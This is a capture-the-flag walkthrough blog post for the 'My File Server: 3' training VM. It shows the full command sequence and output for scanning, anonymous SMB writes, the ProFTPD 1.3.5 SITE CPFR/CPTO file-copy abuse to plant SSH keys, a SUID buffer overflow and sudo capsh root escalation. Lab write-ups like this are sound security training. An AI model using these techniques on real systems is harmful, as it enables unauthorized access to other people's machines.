577, Gold Plaza, Punjab Jewellers, M.G. Road, Opp. Treasure Island Mall

My File Server: 3 Walkthrough

I will share with you a new Walkthrough for Infosec Warriors CTF machines. My File Server: 3 Walkthrough for the CTF machine is created by Vishal Biswas AKA Cyberknight. You can download here this CTF. It states the level is Intermediate level and that is true. Either way, you explore a little if this is unfamiliar and that’s how you learn.

My File Server: 3 Walkthrough

Penetration Testing Methodologies

Network Scan

  •  Netdicover
  •  Nmap Enumeration

Enumeration

  •  Nikto
  • Nmap Scripts
  •  Injecting authorized_keys via smb
  •  ProFTPd 1.3.5  File Copy

Privilege Escalation

  • Buffer overflow
  • Capture the Flag.
  • password
  • sudo

Network Scanning

So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host found is 192.168.2.11

#netdiscover -i vboxnet0

 Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts

 2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 102
 _____________________________________________________________________________
 IP At         MAC Address       Count  Len MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.2.2   08:00:27:25:0f:48  1      42 PCS Systemtechnik GmbH
 192.168.2.11  08:00:27:a8:98:39  1      60 PCS Systemtechnik GmbH

Let’s proceed with a network scan using Nmap aggressive scan as given below.

#nmap -p- -A -sC -O 192.168.2.11

 Nmap scan report for 192.168.2.11
 Not shown: 65523 closed ports
 PORT STATE SERVICE VERSION
 21/tcp open ftp vsftpd 3.0.2
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_drwxrwxrwx 3 0 0 16 Feb 19 07:48 pub [NSE: writeable]
 | ftp-syst:
 | vsFTPd 3.0.2 - secure, fast, stable
 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
 | ssh-hostkey:
 | 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
 80/tcp open http Apache httpd 2.4.6 ((CentOS))
 | http-methods:
 |_http-server-header: Apache/2.4.6 (CentOS)
 |_http-title: My File Server
 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
 445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
 1337/tcp open waste?
 | fingerprint-strings:
 | GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, TerminalServerCookie:
 |_ Why are you here ?!
 2049/tcp open nfs_acl 3 (RPC #100227)
 2121/tcp open ftp ProFTPD 1.3.5
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_drwxrwxrwx 3 root root 16 Feb 19 07:48 pub [NSE: writeable]
 20048/tcp open mountd 1-3 (RPC #100005)
 35756/tcp open nlockmgr 1-4 (RPC #100021)
 35992/tcp open status 1 (RPC #100024)
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 Device type: general purpose
 Running: Linux 3.X
 OS CPE: cpe:/o:linux:linux_kernel:3
 OS details: Linux 3.4 - 3.10
 Network Distance: 1 hop
 Service Info: Host: FILESERVER; OS: Unix
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Enumeration

It was very interesting. I noticed many ports were open and have Anonymous Login enabled. So I decided to enumerate more with Nmap scripts. Along with port number 80.

#nmap -p 139,445 --script=smb-enum* 192.168.2.11

 Nmap scan report for 192.168.2.11
 PORT STATE SERVICE
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 MAC Address: 08:00:27:A8:98:39 (Oracle VirtualBox virtual NIC)
 Host script results:
 | smb-enum-shares:
 | account_used: <blank>
 | \\192.168.2.11\IPC$:
 | Type: STYPE_IPC_HIDDEN
 | Comment: IPC Service (Samba 4.9.1)
 | Max Users: <unlimited>
 | Path: C:\tmp
 | Anonymous access: READ/WRITE
 | \\192.168.2.11\print$:
 | Type: STYPE_DISKTREE
 | Comment: Printer Drivers
 | Users: 0
 | Max Users: <unlimited>
 | Path: C:\var\lib\samba\drivers
 | Anonymous access: <none>
 | \\192.168.2.11\smbdata:
 | Type: STYPE_DISKTREE
 | Comment: smbdata
 | Users: 0
 | Max Users: <unlimited>
 | Path: C:\smbdata
 | Anonymous access: READ/WRITE
 | \\192.168.2.11\smbuser:
 | Type: STYPE_DISKTREE
 | Comment: smbuser
 | Users: 0
 | Max Users: <unlimited>
 | Path: C:\home\smbuser\
 |_ Anonymous access: <none>
 Nmap done: 1 IP address (1 host up) scanned in 300.66 seconds

We know that there might be a “smbuser” on the network.

My File Server: 3 Walkthrough

I choose to run Nikto for HTTP weak config listing, and found an entry for .ssh

#nikto -h http://192.168.2.11

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.2.11
+ Target Hostname: 192.168.2.11
+ Target Port: 80
+ Start Time: 2020-04-06 01:01:31 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3093: /.ssh/authorized_keys: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.

When I tested “.ssh” on web browser….. I got ssh folder, containing id_rsa and authorized_keys.

My File Server: 3 Walkthrough

When I opened authorized_keys. Its confirm that “smbuser” is present in host machine or network.

My File Server: 3 Walkthrough

 

I download file authorized_keys in my local Linux

#wget http://192.168.2.11/.ssh/authorized_keys

 --2020-04-06 01:05:15--  http://192.168.2.11/.ssh/authorized_keys
 Connecting to 192.168.2.11:80... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 410
 Saving to: ‘authorized_keys’ 
 authorized_keys         100%[==============================>]     410  --.-KB/s    in 0s      
 2020-04-06 01:05:15 (39.3 MB/s) - ‘authorized_keys’ saved [410/410]

We know that “smbdata” has read and write permission. So if we place the authorized_keys of our Linux and………………

#smbclient //192.168.2.11/smbdata

 Enter WORKGROUP\root's password: 
 Anonymous login successful
 Try "help" to get a list of possible commands.
 smb: \> ls
  .                                   D        0  Mon Apr  6 00:56:56 2020
  ..                                  D        0  Tue Feb 18 17:17:54 2020
  anaconda                            D        0  Tue Feb 18 17:18:15 2020
  audit                               D        0  Tue Feb 18 17:18:15 2020
  boot.log                            N     6120  Tue Feb 18 17:18:16 2020
  btmp                                N      384  Tue Feb 18 17:18:16 2020
  cron                                N     4813  Tue Feb 18 17:18:16 2020
  dmesg                               N    31389  Tue Feb 18 17:18:16 2020
  dmesg.old                           N    31389  Tue Feb 18 17:18:16 2020
  glusterfs                           D        0  Tue Feb 18 17:18:16 2020
  lastlog                             N   292292  Tue Feb 18 17:18:16 2020
  maillog                             N     1982  Tue Feb 18 17:18:16 2020
  messages                            N   684379  Tue Feb 18 17:18:17 2020
  ppp                                 D        0  Tue Feb 18 17:18:17 2020
  samba                               D        0  Tue Feb 18 17:18:17 2020
  secure                              N    11937  Tue Feb 18 17:18:17 2020
  spooler                             N        0  Tue Feb 18 17:18:17 2020
  tallylog                            N        0  Tue Feb 18 17:18:17 2020
  tuned                               D        0  Tue Feb 18 17:18:17 2020
  wtmp                                N    25728  Tue Feb 18 17:18:17 2020
  xferlog                             N      100  Tue Feb 18 17:18:17 2020
  yum.log                             N    10915  Tue Feb 18 17:18:17 2020
  sshd_config                         N     3906  Wed Feb 19 13:16:38 2020
  todo                                N      162  Tue Feb 25 19:52:29 2020
  id_rsa                              N     1766  Thu Mar 19 10:13:16 2020
  note.txt                            N      128  Thu Mar 19 10:23:12 2020

		19976192 blocks of size 1024. 18257932 blocks available
smb: \> exit

#cd .ssh/
#ls
 authorized_keys  id_rsa  id_rsa.pub  known_hosts
#smbclient //192.168.2.11/smbdata
 Enter WORKGROUP\root's password: 
 Anonymous login successful
 Try "help" to get a list of possible commands.
 smb: \> put authorized_keys 
 putting file authorized_keys as \authorized_keys (61.7 kb/s) (average 61.7 kb/s)
 smb: \> 

It is successfully done. We know that port 2121 ProFTPD 1.3.5 has “file copy” vulnerability. So I log in in FTP 2121 without username and password. Then I copy authorized_keys from /smbdata to /home/smbuser/.ssh/authorized_keys

#telnet 192.168.2.11 2121

 Trying 192.168.2.11...
 Connected to 192.168.2.11.
 Escape character is '^]'.
  220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.2.11]
 site help
  214-The following SITE commands are recognized (* =>'s unimplemented)
  CPFR <sp> pathname
  CPTO <sp> pathname
  HELP
  CHGRP
  CHMOD
  214 Direct comments to [email protected]
 site cpfr /smbdata/authorized_keys
  350 File or directory exists, ready for destination name
 site cpto /home/smbuser/.ssh/authorized_keys
 250 Copy successful

Now I tried to take ssh from id_rsa file and yehhhhh we got a smbuser shell…

#ssh [email protected] -i id_rsa 

   ##############################################################################################
   #					  InfoSec Warrior                                       #             
   #                         --------- www.InfoSecWarrior.com ------------                      #
   #                                    My File Server - 3					#                    
   #  			    Just a simple addition to the problem                               #
   #                               Designed By :- CyberKnight                                   #
   #                                Twitter    :- @CyberKnight00                                #
   ##############################################################################################

 Last login: Mon Apr  6 01:39:47 2020 from 192.168.2.1
 [[email protected] ~]$ id 
  uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)
 [[email protected] ~]$ hostname 
  fileserver

Here we got two folders at home but I didn’t get anything and we have no find and locate command for searching suid files. So I have manually searched and I got a file “esclate”  which has suid bit of user bla.

[[email protected] ~]$  find 
 -bash: find: command not found
[[email protected] ~]$ ls -lha /usr/bin |grep esclate
 -rwsr-xr-x    1 bla  bla     7.4K Feb 27 00:21 esclate

so from this file, we can try to take “bla ” user shell. After feeding a lot of numbers and alphabets .. sometimes it gives “why are you here?” and sometimes “Segmentation fault” …

So I understood what’s happening here. I gave a value {number} which comes in between both the errors. and yeah “I got the bla user group”

[[email protected] ~]$ /usr/bin/esclate 
 123456789012345678901234567{27}
 Why are you here ?!
[[email protected] ~]$ /usr/bin/esclate
 123456789012345687901234567890123456{36}
 Segmentation fault
[[email protected] ~]$ /usr/bin/esclate          
 1234567890123456789012345678901{32}
 Why are you here ?!
[[email protected] ~]$ /usr/bin/esclate     
 1234567890123456789012345678901234{34}  
sh-4.2$ id
 uid=1001(bla) gid=1000(smbuser) groups=1001(bla),1000(smbuser)
sh-4.2$ hostname 
 fileserver
sh-4.2$ uname -a
 Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
sh-4.2$ 

Then I tried to go access bla directory and yeh I was finally in.

and got FLAG of bla user.

sh-4.2$ cd home
sh-4.2$ ls 
 bla  smbuser
sh-4.2$ cd bla
sh-4.2$ ls -lha
 total 40K
 drwx------  2 bla  bla  121 Feb 27 00:29 .
 drwxr-xr-x. 4 root root  30 Feb 25 16:21 ..
 lrwxrwxrwx  1 bla  bla    9 Feb 25 19:57 .bash_history -> /dev/null
 -rw-r--r--  1 bla  bla   18 Mar  6  2015 .bash_logout
 -rw-r--r--  1 bla  bla  193 Mar  6  2015 .bash_profile
 -rw-r--r--  1 bla  bla  231 Mar  6  2015 .bashrc
 -rw-rw-r--  1 bla  bla  516 Feb 27 00:29 user.txt
 -rw-------  1 bla  bla  731 Feb 26 23:36 .viminfo
 -rwxr-xr-x  1 root root 19K Feb 25 16:22 ynetd
sh-4.2$ cat user.txt
   _____ _ _      ____                                     _____ 
  |  ___(_) | ___/ ___|  ___ _ ____   _____ _ __          |___ / 
  | |_  | | |/ _ \___ \ / _ \ '__\ \ / / _ \ '__|  _____    |_ \ 
  |  _| | | |  __/___) |  __/ |   \ V /  __/ |    |_____|  ___) |
  |_|   |_|_|\___|____/ \___|_|    \_/ \___|_|            |____/                                                           
 Flag : 0aab4a2c6d75db7ca2542e0dacc3a30f
 you can crack this hash, because it is also my pasword
 note: crack it, itiseasy

so after cracking the hash, I got bla user password bla:itiseasy. After that, I checked sudo permissions and writes. and I got the two things which can run by Sudo “capsh” and “setcap”.

and I got the root shell…..

sh-4.2$ sudo -l
 Matching Defaults entries for bla on this host:
     requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
     env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
     _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 User bla may run the following commands on this host:
     (ALL) NOPASSWD: /usr/sbin/capsh, (ALL) /usr/sbin/setcap

sh-4.2$ sudo -u root /usr/sbin/capsh --
[[email protected] bla]# id
 uid=0(root) gid=0(root) groups=0(root)
[[email protected] bla]# cd /root/
[[email protected]ileserver ~]# ls 
 proof.txt
[[email protected] ~]# cat proof.txt 
     _______ __    _____                                       _____
    / ____(_) /__ / ___/___  ______   _____  _____            |__  /
   / /_  / / / _ \\__ \/ _ \/ ___/ | / / _ \/ ___/  ______     /_ < 
  / __/ / / /  __/__/ /  __/ /   | |/ /  __/ /     /_____/   ___/ / 
 /_/   /_/_/\___/____/\___/_/    |___/\___/_/               /____/  
                                                                
 flag : 7be300997079eaebcdf9975ede6746e9
[[email protected] ~]# id
 uid=0(root) gid=0(root) groups=0(root)
[[email protected] ~]# hostname
 fileserver
[[email protected] ~]# 

Related Posts

Leave a comment

WhatsApp us